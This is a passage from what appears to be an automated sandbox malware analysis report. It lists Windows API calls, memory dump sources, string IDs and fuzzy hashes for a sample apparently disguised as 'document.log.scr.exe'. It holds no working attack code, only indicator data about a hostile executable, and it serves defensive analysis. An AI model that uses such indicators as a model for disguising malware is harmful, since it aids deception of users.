                                                                  • FlsFree.KERNEL32(00000005,0042720A,?,0042E598,00000060), ref: 00426F56
                                                                  • DeleteCriticalSection.KERNEL32(00000000,00000000,00000000,?,0042720A,?,0042E598,00000060), ref: 0042749C
                                                                  • DeleteCriticalSection.KERNEL32(00000005,00000000,?,0042720A,?,0042E598,00000060), ref: 004274C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalDeleteSection$Free
                                                                  • String ID: h C
                                                                  • API String ID: 1584690612-3285481218
                                                                  • Opcode ID: 01f5279fd6fd29356f328ce173e54860964db3a701b0153208304f489ed11fa6
                                                                  • Instruction ID: 46e1f5d38daa45a4b8a1175150061cd4bbfd52aad6ded1a2a2748f1cabc2c9bd
                                                                  • Opcode Fuzzy Hash: 01f5279fd6fd29356f328ce173e54860964db3a701b0153208304f489ed11fa6
                                                                  • Instruction Fuzzy Hash: D2F0A432A0423097CA346A18BC855A6B6E89F49731B55573FE9E9E32A0C33C9C42866C
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,0042EFE0,00000010,00427463,00000000,00000FA0,74DF0A60,00000000,00427125,00425E71,?,0042E598,00000060), ref: 0042B502
                                                                  • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 0042B512
                                                                  Strings
                                                                  • InitializeCriticalSectionAndSpinCount, xrefs: 0042B50C
                                                                  • kernel32.dll, xrefs: 0042B4FD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                  • API String ID: 1646373207-3733552308
                                                                  • Opcode ID: 268dcd9634f074ec502ce49ec15195abddda11da55df9ab9ea062583cc4446d2
                                                                  • Instruction ID: be9b0aabb06fe80ffec501557c266caa5c5a139848c1c9192b9c21e126a2179c
                                                                  • Opcode Fuzzy Hash: 268dcd9634f074ec502ce49ec15195abddda11da55df9ab9ea062583cc4446d2
                                                                  • Instruction Fuzzy Hash: EBF05470741335FACB10AFB2FD457593BA0EB04748F94452AE814D52A0D77C86819A6D
                                                                  APIs
                                                                    • Part of subcall function 00426B77: _UnwindNestedFrames.LIBCMT ref: 00426B9A
                                                                  • InitializeCriticalSection.KERNEL32(00426CC1,00000003), ref: 0042B4D3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalFramesInitializeNestedSectionUnwind
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 2222982843-393685449
                                                                  • Opcode ID: acd91f781ee38c348a87f521f2261be69d72136644fc5ab93a629eaade7a4ad2
                                                                  • Instruction ID: f15770d1f245a1dc1dc769a00c4ac03cd43f694df1eb78c53a90dae53adbc7e3
                                                                  • Opcode Fuzzy Hash: acd91f781ee38c348a87f521f2261be69d72136644fc5ab93a629eaade7a4ad2
                                                                  • Instruction Fuzzy Hash: 7E719E35B00229DFCF14DF95E881AAE7BB5BF04314F96409BE810AB252C739D951CB9A
                                                                  APIs
                                                                    • Part of subcall function 0042CF9D: _strlen.LIBCMT ref: 0042CFA7
                                                                    • Part of subcall function 0042CF9D: _strcat.LIBCMT ref: 0042CFBB
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000001,00000001,00000049), ref: 0040B3DB
                                                                  • ReleaseMutex.KERNEL32(?,00000000,?), ref: 0040B3FC
                                                                  • ReleaseMutex.KERNEL32(?,?,?,00000000,?), ref: 0040B479
                                                                  • ReleaseMutex.KERNEL32(?,00000000,00000000,?,00000000,000000FF,?,?,00000000,?), ref: 0040B50C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: MutexRelease$ObjectSingleWait_strcat_strlen
                                                                  • String ID:
                                                                  • API String ID: 3541652364-0
                                                                  • Opcode ID: bbe3c3d9775a934ed54bf2637917896e3d47ae8e4b803ca53556c35cce3aae03
                                                                  • Instruction ID: a78adba943f63fa3003e78eeb40ee91bd2e846ea5eff56f134e5d262998a29b7
                                                                  • Opcode Fuzzy Hash: bbe3c3d9775a934ed54bf2637917896e3d47ae8e4b803ca53556c35cce3aae03
                                                                  • Instruction Fuzzy Hash: B761C071900215AFCB14EF69D981AAEB7B4FF44304F50453EE416E7392DB38AA04CBD9
                                                                  APIs
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000003), ref: 00429528
                                                                  • GetLastError.KERNEL32 ref: 00429532
                                                                  • ReadFile.KERNEL32(?,?,00000001,00000000,00000000), ref: 004295FB
                                                                  • GetLastError.KERNEL32 ref: 00429605
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastRead
                                                                  • String ID:
                                                                  • API String ID: 1948546556-0
                                                                  • Opcode ID: 3f785307c448bedb5446c6a9bf72b6bb0fc28e600880c9af1debf9112c80b894
                                                                  • Instruction ID: 0c3f56f59b5ddb8de00e56d924bfdf09652d2d5f3f214e5ba9bd8ddb3cf10382
                                                                  • Opcode Fuzzy Hash: 3f785307c448bedb5446c6a9bf72b6bb0fc28e600880c9af1debf9112c80b894
                                                                  • Instruction Fuzzy Hash: DB61C6317043A59FDF218F58D884B997BE0BF11308F94449BE5658B291C378DD46CB5A
                                                                  APIs
                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,00000001), ref: 0042BD87
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: f012d2ce11893e90015ea5c14048fdc879c812517038c19f2c3335cefbc8be64
                                                                  • Instruction ID: b69cdc61513ac084dd584beffdc22afea9c25ed320d97ba110819b699bdfb182
                                                                  • Opcode Fuzzy Hash: f012d2ce11893e90015ea5c14048fdc879c812517038c19f2c3335cefbc8be64
                                                                  • Instruction Fuzzy Hash: 7F518D31A10268CFDB32DFA9E880BEDBBB8FF45704FA1401AE9599B252D7344A01DF55
                                                                  APIs
                                                                  • __lock.LIBCMT ref: 0042C2C5
                                                                    • Part of subcall function 0042758B: EnterCriticalSection.KERNEL32(?,?,?,004255E1,00000004,0042E528,0000000C,004274A4,00000000,?,0042720A,?,0042E598,00000060), ref: 004275B3
                                                                  • __lock.LIBCMT ref: 0042C311
                                                                  • EnterCriticalSection.KERNEL32(0000008C,0042F618,00000014,0042C70F,?,00000000,00000000), ref: 0042C35B
                                                                  • LeaveCriticalSection.KERNEL32(0000008C), ref: 0042C368
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Enter__lock$Leave
                                                                  • String ID:
                                                                  • API String ID: 885841014-0
                                                                  • Opcode ID: 7e985fef4b773b36eea96ff8ad1ba3abeacee3e0040d83120a73aba8512290a5
                                                                  • Instruction ID: 190f3578051f98c2978070aa1ace5d718f57cceca4cdef8a86f22cce7d92fca2
                                                                  • Opcode Fuzzy Hash: 7e985fef4b773b36eea96ff8ad1ba3abeacee3e0040d83120a73aba8512290a5
                                                                  • Instruction Fuzzy Hash: A3412531B007228BDB24EB65F88566E77A0AF01334FA5872FD461962D1CB7C8542CB5C
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: _strlen$___initmbctable_strcat
                                                                  • String ID:
                                                                  • API String ID: 109824703-0
                                                                  • Opcode ID: 44cb392498c457a785b614b44fbaef805f722a37786de15f251c48ecf979d9cf
                                                                  • Instruction ID: 5385ac430a30b69aec2053d85f27ee94e75532dfac9a54d499d343a2729e6959
                                                                  • Opcode Fuzzy Hash: 44cb392498c457a785b614b44fbaef805f722a37786de15f251c48ecf979d9cf
                                                                  • Instruction Fuzzy Hash: EC1189726064309FD728BF247D4062B7BA5FB403347A4017FED8183262DB3D9855D68E
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00419270,00000002,?,0000000A,00000000,?,?,?,?,?,?,?), ref: 004074AC
                                                                  • ReleaseMutex.KERNEL32(?,?,0000000A,00000000,?,?,?,?,?,?,?,00000002,00000003,?,0000000A), ref: 004074C9
                                                                  • ReleaseMutex.KERNEL32(?,?,0000000A,00000000,?,?,?,?,?,?,?,00000002,00000003,?,0000000A), ref: 004074DD
                                                                  • ReleaseMutex.KERNEL32(?,?,0000000A,00000000,?,?,?,?,?,?,?,00000002,00000003,?,0000000A), ref: 004074F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: MutexRelease$ObjectSingleWait
                                                                  • String ID:
                                                                  • API String ID: 257779224-0
                                                                  • Opcode ID: 7bb46ad1b88fb9a9461e7f10708a0b149a012f52996eac07301728bedeecd2fa
                                                                  • Instruction ID: 3b8a7f17e4ebfe061791b5d315a4e5195bc8dd0f575c6c97dd90d4b1bd1d3e46
                                                                  • Opcode Fuzzy Hash: 7bb46ad1b88fb9a9461e7f10708a0b149a012f52996eac07301728bedeecd2fa
                                                                  • Instruction Fuzzy Hash: 4BF044773045009B8274DB1AEA04867B7A6FBD53213454A3AF542D3750C535FC06CA64
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Info
                                                                  • String ID: $
                                                                  • API String ID: 1807457897-3032137957
                                                                  • Opcode ID: 9f2c1d363d286c5108caad8f61244589310624b698a3e47248c20c3c2974706b
                                                                  • Instruction ID: 8a9144dc760d119363f862b2835ecdd30cff94b7cff921278a221d8c6e03feef
                                                                  • Opcode Fuzzy Hash: 9f2c1d363d286c5108caad8f61244589310624b698a3e47248c20c3c2974706b
                                                                  • Instruction Fuzzy Hash: 83416A302003786FEB168B54ED6ABFB7BE8EF06344F6444E2D585C71A2C3984A9587DC
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: __lock
                                                                  • String ID: $C$$$C
                                                                  • API String ID: 1351747465-3751191682
                                                                  • Opcode ID: 644a0982e1412aae1b84127758aa2c5dd4611e4ab37dedf937013aa29887e9e1
                                                                  • Instruction ID: b1263411a33c7abb084cf6b3ba1c38a65e28a18038912d737f562992e4ca65ea
                                                                  • Opcode Fuzzy Hash: 644a0982e1412aae1b84127758aa2c5dd4611e4ab37dedf937013aa29887e9e1
                                                                  • Instruction Fuzzy Hash: 1B41A031F002248BCF28DF2AF8C556D3BA1EB59310BA5806BD809EB355C73CAD418B9D
                                                                  APIs
                                                                  • ___initmbctable.LIBCMT ref: 0042A999
                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\document.log.scr.exe,00000104,74DF0A60,00000000,?,?,?,?,00425EB0,?,0042E598,00000060), ref: 0042A9B1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleName___initmbctable
                                                                  • String ID: C:\Users\user\Desktop\document.log.scr.exe
                                                                  • API String ID: 767393020-3851360081
                                                                  • Opcode ID: fe242c3c7747c275fabc0e21f379b715d9f809c354b0570d9209d5f4ff350ee6
                                                                  • Instruction ID: 44a9705287dc85e6541789c5441cd73dc39d0e17858977665928a33e7fa3aab4
                                                                  • Opcode Fuzzy Hash: fe242c3c7747c275fabc0e21f379b715d9f809c354b0570d9209d5f4ff350ee6
                                                                  • Instruction Fuzzy Hash: 26113AB2B00220ABCB11DBAABD4069B77F8EB44320F51057FFD05D3241D6B89E40C759
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00424767
                                                                    • Part of subcall function 0042509E: RaiseException.KERNEL32(?,?,0042D4D3,004301F4,?,0042E4A8,?,?,?,00424841,0042D4D3,004301F4,00432030,00413E01,0042D4D3,000000FF), ref: 004250CC
                                                                    • Part of subcall function 004255BE: __lock.LIBCMT ref: 004255DC
                                                                    • Part of subcall function 004255BE: HeapFree.KERNEL32(00000000,?,0042E528,0000000C,004274A4,00000000,?,0042720A,?,0042E598,00000060), ref: 00425623
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
